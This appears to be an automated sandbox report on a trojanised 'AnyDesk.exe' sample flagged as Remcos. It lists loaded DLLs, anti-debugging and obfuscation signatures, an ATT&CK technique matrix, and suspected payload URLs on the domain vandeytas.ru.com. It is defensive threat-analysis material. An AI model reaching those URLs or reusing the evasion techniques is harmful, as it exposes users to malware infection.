      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: AnyDesk.exeStatic file information: File size 1299968 > 1048576
      Source: Binary string: easinvoker.pdb source: AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.exe, 00000000.00000003.2120469469.00000000027D1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 0.2.AnyDesk.exe.2b20000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B3894C
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4D2FC push 02B4D367h; ret 0_2_02B4D35F
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B263B0 push 02B2640Bh; ret 0_2_02B26403
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B263AE push 02B2640Bh; ret 0_2_02B26403
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2332C push eax; ret 0_2_02B23368
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4C378 push 02B4C56Eh; ret 0_2_02B4C566
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2C349 push 8B02B2C1h; ret 0_2_02B2C34E
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4D0AC push 02B4D125h; ret 0_2_02B4D11D
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3306B push 02B330B9h; ret 0_2_02B330B1
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3306C push 02B330B9h; ret 0_2_02B330B1
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4D1F8 push 02B4D288h; ret 0_2_02B4D280
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3F108 push ecx; mov dword ptr [esp], edx0_2_02B3F10D
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4D144 push 02B4D1ECh; ret 0_2_02B4D1E4
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B26782 push 02B267C6h; ret 0_2_02B267BE
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B26784 push 02B267C6h; ret 0_2_02B267BE
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2D5A0 push 02B2D5CCh; ret 0_2_02B2D5C4
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4C570 push 02B4C56Eh; ret 0_2_02B4C566
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2C56C push ecx; mov dword ptr [esp], edx0_2_02B2C571
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3AAE0 push 02B3AB18h; ret 0_2_02B3AB10
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B38AD8 push 02B38B10h; ret 0_2_02B38B08
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3AADF push 02B3AB18h; ret 0_2_02B3AB10
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2CA4E push 02B2CD72h; ret 0_2_02B2CD6A
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2CBEC push 02B2CD72h; ret 0_2_02B2CD6A
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3886C push 02B388AEh; ret 0_2_02B388A6
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B94850 push eax; ret 0_2_02B94920
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3790C push 02B37989h; ret 0_2_02B37981
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B36946 push 02B369F3h; ret 0_2_02B369EB
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B36948 push 02B369F3h; ret 0_2_02B369EB
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B35E7C push ecx; mov dword ptr [esp], edx0_2_02B35E7E
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B32F60 push 02B32FD6h; ret 0_2_02B32FCE
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B3AB1C
      Source: C:\Users\user\Desktop\AnyDesk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B25908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B25908
      Source: AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
      Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\AnyDesk.exeAPI call chain: ExitProcess graph end nodegraph_0-35291

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B3F744
      Source: C:\Users\user\Desktop\AnyDesk.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B3894C
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B25ACC
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: GetLocaleInfoA,0_2_02B2A7C4
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B25BD8
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: GetLocaleInfoA,0_2_02B2A810
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2920C GetLocalTime,0_2_02B2920C
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B2B78C GetVersionExA,0_2_02B2B78C
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Valid Accounts
      1
      Native API
      1
      Valid Accounts
      1
      Valid Accounts
      1
      Valid Accounts
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Access Token Manipulation
      1
      Access Token Manipulation
      LSASS Memory1
      Query Registry
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      Security Account Manager111
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      System Network Connections Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      AnyDesk.exe66%ReversingLabsWin32.Trojan.Remcos
      AnyDesk.exe32%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      vandeytas.ru.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://vandeytas.ru.com/233_Hlvzmhuinffg0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinffi0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinff0%Avira URL Cloudsafe
